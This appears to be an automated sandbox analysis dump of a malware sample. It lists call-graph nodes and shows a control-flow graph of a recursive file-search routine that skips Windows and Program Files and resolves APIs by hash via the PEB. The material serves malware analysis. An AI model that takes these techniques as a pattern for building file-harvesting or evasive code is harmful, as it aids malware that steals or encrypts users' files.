40d73f 10174->10175 10176 405872 4 API calls 10175->10176 10188 40db63 10175->10188 10179 40d761 10176->10179 10177 404bee 6 API calls 10177->10179 10178 405872 4 API calls 10178->10179 10179->10177 10179->10178 10181 40d971 10179->10181 10180 404ba7 4 API calls 10180->10181 10181->10180 10182 405781 4 API calls 10181->10182 10186 40d9bb 10181->10186 10182->10181 10183 404c4e 6 API calls 10183->10186 10184 405781 4 API calls 10184->10186 10185 4037be 4 API calls 10185->10186 10186->10183 10186->10184 10186->10185 10187 405872 4 API calls 10186->10187 10186->10188 10187->10186 9597 40f12f 9598 41219c 14 API calls 9597->9598 9599 40f13f 9598->9599 9600 41219c 14 API calls 9599->9600 9601 40f14c 9600->9601 9602 41219c 14 API calls 9601->9602 9603 40f159 9602->9603 9604 41219c 14 API calls 9603->9604 9605 40f166 9604->9605 9612 40ed35 9613 4056bf 2 API calls 9612->9613 9614 40ed42 9613->9614 9615 412093 20 API calls 9614->9615 9616 40ed63 9615->9616 9617 412093 20 API calls 9616->9617 9618 40ed73 9617->9618 9619 413aca 4 API calls 9618->9619 9620 40ed80 9619->9620 9621 405695 2 API calls 9620->9621 9622 40ed8e 9621->9622 8066 40f3c5 8071 41219c 8066->8071 8069 41219c 14 API calls 8070 40f3e1 8069->8070 8072 4121b1 8071->8072 8088 40f3d3 8071->8088 8073 4121be 8072->8073 8077 4121c5 8072->8077 8119 413ba4 8073->8119 8075 4121ca 8089 404056 8075->8089 8077->8075 8081 412210 8077->8081 8078 4121c3 8078->8088 8096 405b6f 8078->8096 8081->8088 8124 403fbf 8081->8124 8082 41224d 8085 402bab 2 API calls 8082->8085 8082->8088 8085->8088 8088->8069 8135 402b7c GetProcessHeap RtlAllocateHeap 8089->8135 8091 404066 8093 404095 8091->8093 8137 4031e5 8091->8137 8093->8078 8095 402bab 2 API calls 8095->8093 8097 405b7d 8096->8097 8098 402b7c 2 API calls 8097->8098 8099 405b99 8098->8099 8108 405c02 8099->8108 8173 4059b8 8099->8173 8101 405bba 8102 405c09 8101->8102 8103 402b7c 2 API calls 8101->8103 8104 402bab 2 API calls 8102->8104 8105 405bdd 8103->8105 8104->8108 8105->8102 8106 405be4 8105->8106 8107 402bab 2 API calls 8106->8107 8107->8108 8108->8082 8109 413a58 8108->8109 8110 413a63 8109->8110 8118 412245 8109->8118 8110->8118 8176 405781 8110->8176 8113 405781 4 API calls 8114 413aa0 8113->8114 8179 4057df 8114->8179 8117 405781 4 API calls 8117->8118 8132 402bab 8118->8132 8121 413bad 8119->8121 8120 404056 6 API calls 8122 413bc5 8120->8122 8121->8120 8123 413bb8 8121->8123 8122->8078 8123->8078 8125 402b7c 2 API calls 8124->8125 8126 403fcf 8125->8126 8129 403ff4 8126->8129 8298 403b98 8126->8298 8129->8078 8130 403ff8 GetLastError 8131 402bab 2 API calls 8130->8131 8131->8129 8133 402bb4 GetProcessHeap HeapFree 8132->8133 8134 402bc6 8132->8134 8133->8134 8134->8082 8136 402b98 8135->8136 8136->8091 8138 4031f3 8137->8138 8139 403236 8137->8139 8138->8139 8142 403208 8138->8142 8148 4030a5 8139->8148 8141 403224 8143 403258 8141->8143 8145 4031e5 4 API calls 8141->8145 8154 403263 8142->8154 8143->8093 8143->8095 8145->8143 8146 40320d 8146->8143 8147 4030a5 4 API calls 8146->8147 8147->8141 8160 402ca4 8148->8160 8150 4030b0 8151 4030b5 8150->8151 8164 4030c4 8150->8164 8151->8141 8155 40326d 8154->8155 8156 402b7c 2 API calls 8155->8156 8159 4032b7 8155->8159 8157 40328c 8156->8157 8158 402b7c 2 API calls 8157->8158 8158->8159 8159->8146 8161 403079 8160->8161 8162 40307c 8161->8162 8168 40317b GetPEB 8161->8168 8162->8150 8167 4030eb 8164->8167 8165 4030c0 8165->8141 8167->8165 8170 402c03 8167->8170 8169 40319b 8168->8169 8169->8162 8171 4031e5 3 API calls 8170->8171 8172 402c15 GetProcAddress 8171->8172 8172->8165 8174 4031e5 4 API calls 8173->8174 8175 4059cb 8174->8175 8175->8101 8194 405797 8176->8194 8178 405792 8178->8113 8180 4057eb 8179->8180 8193 405832 8179->8193 8180->8193 8204 4040bb 8180->8204 8183 405839 8184 405853 8183->8184 8231 405627 8183->8231 8242 405762 8184->8242 8185 40582c 8228 403f9e 8185->8228 8192 403f9e 5 API calls 8192->8193 8193->8117 8193->8118 8195 4057a1 8194->8195 8197 4057bd 8194->8197 8195->8197 8198 4056fc 8195->8198 8197->8178 8199 405714 8198->8199 8200 402b7c 2 API calls 8199->8200 8202 405730 8200->8202 8201 405752 8201->8197 8202->8201 8203 402bab 2 API calls 8202->8203 8203->8201 8205 4031e5 4 API calls 8204->8205 8206 4040d5 CreateFileW 8205->8206 8207 4040f8 8206->8207 8208 40418d 8206->8208 8210 4031e5 4 API calls 8207->8210 8209 404183 8208->8209 8248 403c90 8208->8248 8209->8183 8209->8185 8209->8193 8215 404105 8210->8215 8213 40416d 8245 403c40 8213->8245 8215->8213 8219 4031e5 4 API calls 8215->8219 8218 402bab 2 API calls 8218->8209 8221 404131 VirtualAlloc 8219->8221 8220 4040bb 9 API calls 8222 4041c8 8220->8222 8221->8213 8223 404142 8221->8223 8222->8218 8224 4031e5 4 API calls 8223->8224 8225 40414f ReadFile 8224->8225 8225->8213 8226 404160 8225->8226 8227 4031e5 4 API calls 8226->8227 8227->8213 8229 4031e5 4 API calls 8228->8229 8230 403fb1 VirtualFree 8229->8230 8230->8193 8232 4031e5 4 API calls 8231->8232 8233 40563a 8232->8233 8234 405872 8233->8234 8236 405881 8234->8236 8235 4058bc 8238 405797 4 API calls 8235->8238 8239 4058af 8235->8239 8236->8235 8295 4058d4 8236->8295 8238->8239 8239->8184 8241 405781 4 API calls 8241->8235 8243 405781 4 API calls 8242->8243 8244 405770 8243->8244 8244->8192 8246 4031e5 4 API calls 8245->8246 8247 403c52 CloseHandle 8246->8247 8247->8209 8249 403ca3 8248->8249 8252 403caa 8248->8252 8275 405dc5 8249->8275 8251 404056 6 API calls 8253 403cbe 8251->8253 8252->8251 8254 403d3a 8252->8254 8255 403d2e 8253->8255 8256 403d17 8253->8256 8257 403ccf 8253->8257 8254->8209 8271 403c59 8254->8271 8255->8254 8258 402bab 2 API calls 8255->8258 8259 405b6f 6 API calls 8256->8259 8260 405b6f 6 API calls 8257->8260 8258->8254 8261 403d14 8259->8261 8262 403cdd 8260->8262 8265 402bab 2 API calls 8261->8265 8263 405b6f 6 API calls 8262->8263 8264 403cee 8263->8264 8264->8261 8280 403d4d 8264->8280 8265->8255 8268 403d0b 8270 402bab 2 API calls 8268->8270 8270->8261 8272 403c21 8271->8272 8273 4031e5 4 API calls 8272->8273 8274 403c33 8273->8274 8274->8220 8274->8222 8289 406799 8275->8289 8277 405dd5 8278 402b7c 2 API calls 8277->8278 8279 405dfe 8278->8279 8279->8252 8292 403bb7 8280->8292 8282 403cfe 8282->8268 8283 403c62 8282->8283 8284 403d4d 5 API calls 8283->8284 8285 403c6d 8284->8285 8286 403c72 8285->8286 8287 4031e5 4 API calls 8285->8287 8286->8268 8288 403c87 CreateDirectoryW 8287->8288 8288->8268 8290 4031e5 4 API calls 8289->8290 8291 4067ad 8290->8291 8291->8277 8293 4031e5 4 API calls 8292->8293 8294 403bc9 GetFileAttributesW 8293->8294 8294->8282 8296 405797 4 API calls 8295->8296 8297 4058a8 8296->8297 8297->8239 8297->8241 8299 4031e5 4 API calls 8298->8299 8300 403baa 8299->8300 8300->8129 8300->8130 9742 40ebc6 9743 4040bb 12 API calls 9742->9743 9745 40ebdf 9743->9745 9744 40ecd7 9745->9744 9762 407795 9745->9762 9748 40eccd 9749 403f9e 5 API calls 9748->9749 9749->9744 9750 4056bf 2 API calls 9761 40ec12 9750->9761 9751 40ecb5 9752 402bab 2 API calls 9751->9752 9753 40ecbd 9752->9753 9754 413aca 4 API calls 9753->9754 9755 40ecc7 9754->9755 9757 405695 2 API calls 9755->9757 9756 407908 GetProcessHeap RtlAllocateHeap 9756->9761 9757->9748 9759 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9759->9761 9760 402bab GetProcessHeap HeapFree 9760->9761 9761->9751 9761->9756 9761->9759 9761->9760 9773 412269 9761->9773 9764 4077ab 9762->9764 9763 4077b3 9763->9748 9763->9750 9764->9763 9780 405ae9 9764->9780 9766 4077e1 9766->9763 9767 407802 9766->9767 9768 4077f8 9766->9768 9770 402b7c 2 API calls 9767->9770 9769 402bab 2 API calls 9768->9769 9769->9763 9771 407811 9770->9771 9772 402bab 2 API calls 9771->9772 9772->9763 9796 40374e 9773->9796 9776 412299 9776->9761 9779 402bab 2 API calls 9779->9776 9781 405af7 9780->9781 9782 402b7c 2 API calls 9781->9782 9783 405b03 9782->9783 9789 405b5a 9783->9789 9793 405998 9783->9793 9785 405b21 9786 405b61 9785->9786 9788 402b7c 2 API calls 9785->9788 9787 402bab 2 API calls 9786->9787 9787->9789 9790 405b39 9788->9790 9789->9766 9790->9786 9791 405b40 9790->9791 9792 402bab 2 API calls 9791->9792 9792->9789 9794 4031e5 4 API calls 9793->9794 9795 4059ab 9794->9795 9795->9785 9797 402b7c 2 API calls 9796->9797 9798 40375f 9797->9798 9799 4031e5 4 API calls 9798->9799 9802 4037a3 9798->9802 9800 40378f 9799->9800 9801 402bab 2 API calls 9800->9801 9800->9802 9801->9802 9802->9776 9803 4037be 9802->9803 9804 4031e5 4 API calls 9803->9804 9805 4037e2 9804->9805 9806 40382b 9805->9806 9807 402b7c 2 API calls 9805->9807 9806->9779 9808 403802 9807->9808 9809 403832 9808->9809 9811 403809 9808->9811 9810 4036a3 4 API calls 9809->9810 9810->9806 9812 4036a3 4 API calls 9811->9812 9812->9806 8898 410cd1 8903 412093 8898->8903 8901 412093 20 API calls 8902 410cff 8901->8902 8906 4120a5 8903->8906 8924 410cf1 8903->8924 8904 4120b3 8905 404056 6 API calls 8904->8905 8907 4120ba 8905->8907 8906->8904 8910 412100 8906->8910 8908 405b6f 6 API calls 8907->8908 8909 412152 8907->8909 8907->8924 8911 412125 8908->8911 8925 403d74 8909->8925 8913 403fbf 7 API calls 8910->8913 8910->8924 8911->8909 8916 412139 8911->8916 8917 41214d 8911->8917 8913->8907 8915 41218c 8920 402bab 2 API calls 8915->8920 8915->8924 8919 402bab 2 API calls 8916->8919 8921 402bab 2 API calls 8917->8921 8918 402bab 2 API calls 8918->8915 8922 41213e 8919->8922 8920->8924 8921->8909 8923 402bab 2 API calls 8922->8923 8923->8924 8924->8901 8926 403d87 8925->8926 8927 403ea3 8926->8927 8929 405b6f 6 API calls 8926->8929 8928 405b6f 6 API calls 8927->8928 8931 403eb9 8928->8931 8930 403da3 8929->8930 8930->8927 8932 4031e5 4 API calls 8930->8932 8933 4031e5 4 API calls 8931->8933 8941 403f6f 8931->8941 8934 403dbc FindFirstFileW 8932->8934 8935 403ed3 FindFirstFileW 8933->8935 8938 403dd1 8934->8938 8949 403e9c 8934->8949 8940 403ee8 8935->8940 8955 403f8d 8935->8955 8936 402bab 2 API calls 8936->8941 8937 402bab 2 API calls 8937->8927 8939 4031e5 4 API calls 8938->8939 8947 405b6f 6 API calls 8938->8947 8954 403d74 15 API calls 8938->8954 8959 402bab 2 API calls 8938->8959 8960 403f63 8938->8960 8942 403e84 FindNextFileW 8939->8942 8944 4031e5 4 API calls 8940->8944 8946 405b6f 6 API calls 8940->8946 8951 403f75 8940->8951 8958 402bab 2 API calls 8940->8958 8968 40fa23 8940->8968 8941->8915 8941->8918 8942->8938 8943 403e96 8942->8943 8965 403bef 8943->8965 8948 403f50 FindNextFileW 8944->8948 8946->8940 8947->8938 8948->8940 8950 403f87 8948->8950 8949->8937 8952 403bef 5 API calls 8950->8952 8953 402bab 2 API calls 8951->8953 8952->8955 8956 403f7b 8953->8956 8954->8938 8955->8936 8957 403bef 5 API calls 8956->8957 8957->8941 8958->8940 8959->8938 8961 402bab 2 API calls 8960->8961 8962 403f69 8961->8962 8963 403bef 5 API calls 8962->8963 8963->8941 8966 4031e5 4 API calls 8965->8966 8967 403c01 FindClose 8966->8967 8967->8949 8969 40fa39 8968->8969 8970 410293 8969->8970 8971 405b6f 6 API calls 8969->8971 8970->8940 8972 40ffcc 8971->8972 8972->8970 8973 4040bb 12 API calls 8972->8973 8974 40ffeb 8973->8974 8975 41028c 8974->8975 8976 41027d 8974->8976 8978 402b7c 2 API calls 8974->8978 8977 402bab 2 API calls 8975->8977 8979 403f9e 5 API calls 8976->8979 8977->8970 8980 41001e 8978->8980 8979->8975 8980->8976 8981 40a423 4 API calls 8980->8981 8982 41004a 8981->8982 8983 4031e5 4 API calls 8982->8983 8984 41005c 8983->8984 8985 4031e5 4 API calls 8984->8985 8986 410079 8985->8986 8987 4031e5 4 API calls 8986->8987 8988 410096 8987->8988 8989 4031e5 4 API calls 8988->8989 8990 4100b0 8989->8990 8991 4031e5 4 API calls 8990->8991 8992 4100cd 8991->8992 8993 4031e5 4 API calls 8992->8993 8994 4100ea 8993->8994 9024 412516 8994->9024 8996 4100fd 8997 40642c 5 API calls 8996->8997 8998 41013e 8997->8998 8999 410142 8998->8999 9000 41019f 8998->9000 9001 40488c 5 API calls 8999->9001 9003 4031e5 4 API calls 9000->9003 9002 410151 9001->9002 9004 41019c 9002->9004 9006 404866 4 API calls 9002->9006 9016 4101bb 9003->9016 9005 41022a 9004->9005 9008 40642c 5 API calls 9004->9008 9012 413a58 13 API calls 9005->9012 9007 410163 9006->9007 9009 41018e 9007->9009 9011 406c4c 6 API calls 9007->9011 9010 410201 9008->9010 9013 403c40 5 API calls 9009->9013 9014 410205 9010->9014 9015 41022f 9010->9015 9017 410178 9011->9017 9018 41026e 9012->9018 9013->9004 9019 4126a7 7 API calls 9014->9019 9027 4125db 9015->9027 9021 4031e5 4 API calls 9016->9021 9022 406c4c 6 API calls 9017->9022 9023 402bab 2 API calls 9018->9023 9019->9005 9021->9004 9022->9009 9023->8976 9025 4031e5 4 API calls 9024->9025 9026 412539 9025->9026 9026->8996 9028 40488c 5 API calls 9027->9028 9029 4125ec 9028->9029 9030 41269f 9029->9030 9031 4031e5 4 API calls 9029->9031 9030->9005 9032 412609 9031->9032 9033 41268f 9032->9033 9034 4031e5 4 API calls 9032->9034 9035 403c40 5 API calls 9033->9035 9036 41262a 9034->9036 9035->9030 9042 412675 9036->9042 9044 4124f1 9036->9044 9037 4031e5 4 API calls 9037->9033 9040 4124f1 4 API calls 9043 412663 9040->9043 9041 4031e5 4 API calls 9041->9042 9042->9037 9043->9041 9045 4031e5 4 API calls 9044->9045 9046 412503 9045->9046 9046->9040 9046->9043 9233 4049dc 9234 4031e5 4 API calls 9233->9234 9235 4049ef 9234->9235 10080 40cddd 10081 405b6f 6 API calls 10080->10081 10082 40cdee 10081->10082 10083 40ce06 10082->10083 10084 413a58 13 API calls 10082->10084 10085 40ce59 10083->10085 10087 405b6f 6 API calls 10083->10087 10086 40ce00 10084->10086 10088 402bab 2 API calls 10086->10088 10089 40ce1c 10087->10089 10088->10083 10089->10085 10090 40ce52 10089->10090 10092 403d74 19 API calls 10089->10092 10091 402bab 2 API calls 10090->10091 10091->10085 10093 40ce45 10092->10093 10093->10090 10094 402bab 2 API calls 10093->10094 10094->10090 9236 40ecde 9237 412093 20 API calls 9236->9237 9238 40ecfd 9237->9238 9239 412093 20 API calls 9238->9239 9240 40ed0d 9239->9240 9244 40e8df 9245 412093 20 API calls 9244->9245 9246 40e8f8 9245->9246 9247 412093 20 API calls 9246->9247 9248 40e908 9247->9248 9255 404b22 9248->9255 9250 40e91c 9251 40e936 9250->9251 9254 40e93d 9250->9254 9262 40e944 9250->9262 9253 402bab 2 API calls 9251->9253 9253->9254 9256 402b7c 2 API calls 9255->9256 9257 404b33 9256->9257 9260 404b66 9257->9260 9271 4049b3 9257->9271 9260->9250 9261 402bab 2 API calls 9261->9260 9263 4056bf 2 API calls 9262->9263 9264 40e952 9263->9264 9265 40e976 9264->9265 9266 4057df 13 API calls 9264->9266 9265->9251 9267 40e966 9266->9267 9268 413aca 4 API calls 9267->9268 9269 40e970 9268->9269 9270 405695 2 API calls 9269->9270 9270->9265 9272 4031e5 4 API calls 9271->9272 9273 4049c6 9272->9273 9273->9260 9273->9261 9274 4139de 9283 413855 9274->9283 9276 4139f1 9277 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9276->9277 9278 4139f7 9277->9278 9279 413866 59 API calls 9278->9279 9280 413a2d 9279->9280 9281 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9280->9281 9282 413a34 9281->9282 9284 4031e5 4 API calls 9283->9284 9285 413864 9284->9285 9285->9285 10189 4116e7 10190 4117ba 10189->10190 10191 405b6f 6 API calls 10190->10191 10196 4117f1 10190->10196 10192 4117d0 10191->10192 10193 404cbf 8 API calls 10192->10193 10192->10196 10194 4117eb 10193->10194 10195 402bab 2 API calls 10194->10195 10195->10196 9305 4094e7 9306 404b22 6 API calls 9305->9306 9307 4094fe 9306->9307 9308 409554 9307->9308 9309 405b6f 6 API calls 9307->9309 9310 409514 9309->9310 9312 404b22 6 API calls 9310->9312 9317 40954d 9310->9317 9311 402bab 2 API calls 9311->9308 9313 40952d 9312->9313 9315 409408 15 API calls 9313->9315 9319 409544 9313->9319 9314 402bab 2 API calls 9314->9317 9316 40953e 9315->9316 9318 402bab 2 API calls 9316->9318 9317->9311 9318->9319 9319->9314 9328 4058ea 9329 4031e5 4 API calls 9328->9329 9330 4058fd StrStrA 9329->9330 10238 40d4ea 10239 404bee 6 API calls 10238->10239 10240 40d500 10239->10240 10241 404bee 6 API calls 10240->10241 10246 40d5a0 10240->10246 10242 40d529 10241->10242 10243 404bee 6 API calls 10242->10243 10244 40d537 10243->10244 10245 404bee 6 API calls 10244->10245 10247 40d546 10245->10247 10247->10246 10248 405872 4 API calls 10247->10248 10249 40d56d 10248->10249 10250 405872 4 API calls 10249->10250 10251 40d57c 10250->10251 10252 405872 4 API calls 10251->10252 10253 40d58e 10252->10253 10254 405872 4 API calls 10253->10254 10254->10246 10255 40a3ea 10256 40374e 6 API calls 10255->10256 10257 40a403 10256->10257 10258 4059d8 4 API calls 10257->10258 10261 40a419 10257->10261 10259 40a411 10258->10259 10260 402bab 2 API calls 10259->10260 10260->10261 9368 404df3 WSAStartup 9372 4091f6 9373 404b22 6 API calls 9372->9373 9374 40920b 9373->9374 9375 409222 9374->9375 9376 409408 15 API calls 9374->9376 9377 40921c 9376->9377 9378 402bab 2 API calls 9377->9378 9378->9375 10346 4117fe 10347 404c4e 6 API calls 10346->10347 10348 411888 10347->10348 10349 404c4e 6 API calls 10348->10349 10352 411925 10348->10352 10350 4118ab 10349->10350 10350->10352 10365 4119b3 10350->10365 10353 4118c5 10354 4119b3 4 API calls 10353->10354 10355 4118d0 10354->10355 10355->10352 10356 4056bf 2 API calls 10355->10356 10357 4118fd 10356->10357 10358 405872 4 API calls 10357->10358 10359 41190a 10358->10359 10360 405872 4 API calls 10359->10360 10361 411915 10360->10361 10362 413aca 4 API calls 10361->10362 10363 41191f 10362->10363 10364 405695 2 API calls 10363->10364 10364->10352 10366 4119c6 10365->10366 10368 4119bf 10365->10368 10367 4031e5 4 API calls 10366->10367 10367->10368 10368->10353 9382 40e880 9383 41219c 14 API calls 9382->9383 9384 40e88e 9383->9384 9385 41219c 14 API calls 9384->9385 9386 40e89c 9385->9386 9874 40e48a 9875 404bee 6 API calls 9874->9875 9877 40e4d0 9875->9877 9876 40e4f4 9877->9876 9878 405872 4 API calls 9877->9878 9878->9876 9483 410390 9484 404b22 6 API calls 9483->9484 9485 4103a5 9484->9485 9486 410409 9485->9486 9487 405b6f 6 API calls 9485->9487 9492 4103ba 9487->9492 9488 410402 9489 402bab 2 API calls 9488->9489 9489->9486 9490 4103fb 9491 402bab 2 API calls 9490->9491 9491->9488 9492->9488 9492->9490 9493 403d74 19 API calls 9492->9493 9494 4103ee 9493->9494 9494->9490 9495 402bab 2 API calls 9494->9495 9495->9490 9930 40ed96 9931 4040bb 12 API calls 9930->9931 9943 40edb0 9931->9943 9932 40ef90 9933 40ef87 9934 403f9e 5 API calls 9933->9934 9934->9932 9935 412269 6 API calls 9935->9943 9936 405ae9 6 API calls 9936->9943 9937 40ef61 9938 40ef6e 9937->9938 9939 402bab 2 API calls 9937->9939 9940 40ef7c 9938->9940 9941 402bab 2 API calls 9938->9941 9939->9938 9940->9933 9942 402bab 2 API calls 9940->9942 9941->9940 9942->9933 9943->9932 9943->9933 9943->9935 9943->9936 9943->9937 9944 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9943->9944 9945 402bab GetProcessHeap HeapFree 9943->9945 9944->9943 9945->9943 9946 40ef98 9947 404c4e 6 API calls 9946->9947 9948 40efb6 9947->9948 9949 40f02a 9948->9949 9961 40f054 9948->9961 9952 404bee 6 API calls 9953 40efda 9952->9953 9954 404bee 6 API calls 9953->9954 9955 40efe9 9954->9955 9955->9949 9956 405872 4 API calls 9955->9956 9957 40f008 9956->9957 9958 405872 4 API calls 9957->9958 9959 40f01a 9958->9959 9960 405872 4 API calls 9959->9960 9960->9949 9962 40f064 9961->9962 9963 402b7c 2 API calls 9962->9963 9965 40f072 9963->9965 9964 40efca 9964->9952 9965->9964 9967 405ecd 9965->9967 9968 4059b8 4 API calls 9967->9968 9969 405edf 9968->9969 9969->9965 9502 410c98 9503 41219c 14 API calls 9502->9503 9504 410ca8 9503->9504 9505 41219c 14 API calls 9504->9505 9506 410cb5 9505->9506 9507 412093 20 API calls 9506->9507 9508 410cc9 9507->9508 10095 41249c 10096 4056bf 2 API calls 10095->10096 10097 4124aa 10096->10097 10098 4057df 13 API calls 10097->10098 10103 4124ce 10097->10103 10099 4124be 10098->10099 10100 413aca 4 API calls 10099->10100 10101 4124c8 10100->10101 10102 405695 2 API calls 10101->10102 10102->10103 9512 40f49e 9513 40f4b6 13 API calls 9512->9513 9514 40f4a8 9513->9514 9515 40929e 9516 413b28 6 API calls 9515->9516 9517 4092a4 9516->9517 9518 405b6f 6 API calls 9517->9518 9519 4092af 9518->9519 9520 409408 15 API calls 9519->9520 9523 4092c5 9519->9523 9521 4092bf 9520->9521 9522 402bab 2 API calls 9521->9522 9522->9523 10127 407fa4 10128 407fb7 10127->10128 10129 402b7c 2 API calls 10128->10129 10131 407fee 10128->10131 10130 40800d 10129->10130 10130->10131 10132 4037be 4 API calls 10130->10132 10133 40803c 10132->10133 10134 402bab 2 API calls 10133->10134 10134->10131 9560 4090aa 9561 404b22 6 API calls 9560->9561 9562 4090c1 9561->9562 9563 4090d8 9562->9563 9564 409408 15 API calls 9562->9564 9565 404b22 6 API calls 9563->9565 9566 4090d2 9564->9566 9567 4090eb 9565->9567 9568 402bab 2 API calls 9566->9568 9569 409104 9567->9569 9570 408c4d 15 API calls 9567->9570 9568->9563 9571 4090fe 9570->9571 9572 402bab 2 API calls 9571->9572 9572->9569 9579 409cae 9594 404b79 9579->9594 9581 409cc5 9583 405b6f 6 API calls 9581->9583 9584 409d2f 9581->9584 9586 409d27 9581->9586 9582 402bab 2 API calls 9582->9584 9585 409cec 9583->9585 9585->9586 9587 404b79 6 API calls 9585->9587 9586->9582 9588 409d05 9587->9588 9589 409d1e 9588->9589 9590 408c4d 15 API calls 9588->9590 9591 402bab 2 API calls 9589->9591 9592 409d18 9590->9592 9591->9586 9593 402bab 2 API calls 9592->9593 9593->9589 9595 404b22 6 API calls 9594->9595 9596 404b8a 9595->9596 9596->9581 10267 411fb3 10268 405b6f 6 API calls 10267->10268 10270 412013 10268->10270 10269 412075 10270->10269 10285 41206a 10270->10285 10286 411a8d 10270->10286 10272 402bab 2 API calls 10272->10269 10274 4056bf 2 API calls 10275 41203d 10274->10275 10276 405872 4 API calls 10275->10276 10277 41204a 10276->10277 10278 413aca 4 API calls 10277->10278 10279 412054 10278->10279 10280 405695 2 API calls 10279->10280 10281 41205a 10280->10281 10282 413a58 13 API calls 10281->10282 10283 412064 10282->10283 10284 402bab 2 API calls 10283->10284 10284->10285 10285->10272 10287 402b7c 2 API calls 10286->10287 10288 411aa3 10287->10288 10296 411f05 10288->10296 10309 404ada 10288->10309 10291 404ada 4 API calls 10292 411cad 10291->10292 10293 411f0c 10292->10293 10294 411cc0 10292->10294 10295 402bab 2 API calls 10293->10295 10312 405eb6 10294->10312 10295->10296 10296->10274 10296->10285 10298 411d3c 10299 4031e5 4 API calls 10298->10299 10307 411d7b 10299->10307 10300 411ea6 10301 4031e5 4 API calls 10300->10301 10302 411eb5 10301->10302 10303 4031e5 4 API calls 10302->10303 10304 411ed6 10303->10304 10305 405eb6 4 API calls 10304->10305 10305->10296 10306 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10306->10307 10307->10300 10307->10306 10308 405eb6 4 API calls 10307->10308 10308->10307 10310 4031e5 4 API calls 10309->10310 10311 404afd 10310->10311 10311->10291 10313 405998 4 API calls 10312->10313 10314 405ec8 10313->10314 10314->10298 9626 40f6b8 9627 41219c 14 API calls 9626->9627 9628 40f6c7 9627->9628 9629 41219c 14 API calls 9628->9629 9630 40f6d5 9629->9630 9631 41219c 14 API calls 9630->9631 9632 40f6df 9631->9632 9651 40d6bd 9652 4056bf 2 API calls 9651->9652 9653 40d6c9 9652->9653 9664 404cbf 9653->9664 9656 404cbf 8 API calls 9657 40d6f4 9656->9657 9658 404cbf 8 API calls 9657->9658 9659 40d702 9658->9659 9660 413aca 4 API calls 9659->9660 9661 40d711 9660->9661 9662 405695 2 API calls 9661->9662 9663 40d71f 9662->9663 9665 402b7c 2 API calls 9664->9665 9666 404ccd 9665->9666 9667 404ddc 9666->9667 9668 404b8f 5 API calls 9666->9668 9667->9656 9669 404ce4 9668->9669 9670 404dd4 9669->9670 9671 402b7c 2 API calls 9669->9671 9672 402bab 2 API calls 9670->9672 9682 404d04 9671->9682 9672->9667 9673 404dcc 9674 404a39 5 API calls 9673->9674 9674->9670 9675 404dc6 9676 402bab 2 API calls 9675->9676 9676->9673 9677 402b7c 2 API calls 9677->9682 9678 404b8f 5 API calls 9678->9682 9679 402bab GetProcessHeap HeapFree 9679->9682 9680 404a39 5 API calls 9680->9682 9681 405b6f 6 API calls 9681->9682 9682->9673 9682->9675 9682->9677 9682->9678 9682->9679 9682->9680 9682->9681 9683 404cbf 8 API calls 9682->9683 9683->9682 9684 40f0bf 9685 4056bf 2 API calls 9684->9685 9686 40f0c9 9685->9686 9687 40f115 9686->9687 9688 404cbf 8 API calls 9686->9688 9689 41219c 14 API calls 9687->9689 9691 40f0ed 9688->9691 9690 40f128 9689->9690 9692 404cbf 8 API calls 9691->9692 9693 40f0fb 9692->9693 9694 413aca 4 API calls 9693->9694 9695 40f10a 9694->9695 9696 405695 2 API calls 9695->9696 9696->9687

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 159 403dd1-403dd8 151->159 160 403e9d-403ea4 call 402bab 151->160 156 403f97-403f9d 152->156 161 403ee8-403ef8 call 405d24 153->161 162 403f8e-403f94 call 402bab 153->162 163 403e75-403e90 call 4031e5 FindNextFileW 159->163 164 403dde-403de2 159->164 160->150 176 403f03-403f0a 161->176 177 403efa-403f01 161->177 162->152 163->159 180 403e96-403e97 call 403bef 163->180 169 403e12-403e22 call 405d24 164->169 170 403de4-403df9 call 405eff 164->170 189 403e30-403e4c call 405b6f 169->189 190 403e24-403e2e 169->190 170->163 186 403dfb-403e10 call 405eff 170->186 182 403f12-403f2d call 405b6f 176->182 183 403f0c-403f10 176->183 177->176 181 403f41-403f5c call 4031e5 FindNextFileW 177->181 195 403e9c 180->195 198 403f87-403f88 call 403bef 181->198 199 403f5e-403f61 181->199 182->181 196 403f2f-403f33 182->196 183->181 183->182 186->163 186->169 189->163 203 403e4e-403e6f call 403d74 call 402bab 189->203 190->163 190->189 195->160 201 403f75-403f85 call 402bab call 403bef 196->201 202 403f35-403f36 call 40fa23 196->202 207 403f8d 198->207 199->161 201->156 209 403f39-403f40 call 402bab 202->209 203->163 217 403f63-403f73 call 402bab call 403bef 203->217 207->162 209->181 217->156
                              APIs
                              • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                              • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                              • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                              • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileFind$FirstNext
                              • String ID: %s\%s$%s\*$Program Files$Windows
                              • API String ID: 1690352074-2009209621
                              • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
